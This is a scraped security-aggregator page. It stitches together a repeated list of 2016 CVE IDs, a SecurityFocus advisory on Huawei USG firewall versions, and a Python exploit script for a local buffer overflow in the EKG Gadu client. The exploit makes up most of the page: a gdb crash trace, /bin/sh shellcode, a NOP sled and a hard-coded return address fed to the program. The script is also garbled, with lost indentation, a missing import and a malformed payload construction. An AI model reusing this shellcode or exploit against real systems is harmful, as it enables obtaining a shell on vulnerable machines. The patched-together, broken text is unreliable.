CVE-2016-7532
CVE-2016-7533
CVE-2016-7534
CVE-2016-7535
CVE-2016-7537
CVE-2016-7538
CVE-2016-7519
CVE-2016-7520
CVE-2016-7521
CVE-2016-7522
CVE-2016-7523
CVE-2016-7524
CVE-2016-7525
CVE-2016-7526
CVE-2016-7529
CVE-2016-7530
CVE-2016-7531
CVE-2016-7532
CVE-2016-7533
CVE-2016-7534
CVE-2016-7535
CVE-2016-7537
CVE-2016-7538
CVE-2016-7519
CVE-2016-7520
CVE-2016-7521
CVE-2016-7522
CVE-2016-7523
CVE-2016-7524
CVE-2016-7525
CVE-2016-7526
CVE-2016-7529
CVE-2016-7530
CVE-2016-7531
CVE-2016-7532
CVE-2016-7533
CVE-2016-7534
CVE-2016-7535
CVE-2016-7537
CVE-2016-7538


SecurityFocus Vulnerabilities

# Exploit developed using Exploit Pack v6.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# [email protected]
# Program affected: EKG Gadu
# Affected value: USERNAME
# Version: 1:1.9~pre+r2855-3+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: console Gadu Gadu client for UNIX systems - ncurses UI
# EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source
# Gadu-Gadu client for UNIX systems.
# Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb
# MD5sum: c752577dfb5ea44513a3fb351d431afa
# Website: http://ekg.chmurka.net/
#
# gdb$ run `python -c 'print "A"*258'`
# 0x0807e125 in strlcpy ()
# gdb$ backtrace
# #0 0x0807e125 in strlcpy ()
# #1 0x080570bb in ioctld_socket ()
# #2 0x08052e60 in main ()

import os, subprocess

def run():
try:
print "# EKG Gadu - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP

buffersize = 240
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x20\xf1\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["ekg ",' ', buffer])

except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, EKG Gadu - Not found!"
else:
print "Error executing exploit"
raise

def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)

if __name__ == '__main__':
try:
print "Exploit EKG Gadu - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()


Exploit Files ≈ Packet Storm

Bugtraq ID: 92962 Class: Boundary Condition Error CVE: CVE-2016-8276 Remote: Yes Local: No Published: Sep 14 2016 12:00AM Updated: Sep 19 2016 02:00PM Credit: The vendor reported this issue. Vulnerable: Huawei USG5500 V300R001C10
Huawei USG5500 V300R001C00
Huawei USG5100 V300R001C10
Huawei USG5100 V300R001C00
Huawei USG2200 V300R001C10
Huawei USG2200 V300R001C00
Huawei USG2100 V300R001C10
Huawei USG2100 V300R001C00 Not Vulnerable: Huawei USG5500 V300R001C10SPC600
Huawei USG5100 V300R001C10SPC600
Huawei USG2200 V300R001C10SPC600
Huawei USG2100 V300R001C10SPC600


SecurityFocus Vulnerabilities